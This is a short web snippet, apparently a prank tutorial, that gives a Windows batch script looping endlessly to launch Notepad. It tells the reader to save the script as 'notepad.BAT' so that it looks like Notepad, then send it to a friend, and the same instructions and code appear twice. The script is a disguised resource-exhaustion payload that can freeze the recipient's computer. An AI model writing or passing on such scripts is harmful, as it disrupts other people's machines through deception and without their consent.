type='html'>a code below that will drive your friend crazy as it opens notepad continuously.
When you type the below code and rename it as *.bat it take the above showed icon shape.
To Open Notepad continuously in your friend’s computer:
Type the code in notepad as :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “notepad.BAT” and send it.
To Open Notepad continuously in your friend’s computer:
Type the code in notepad as :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “notepad.BAT” and send it.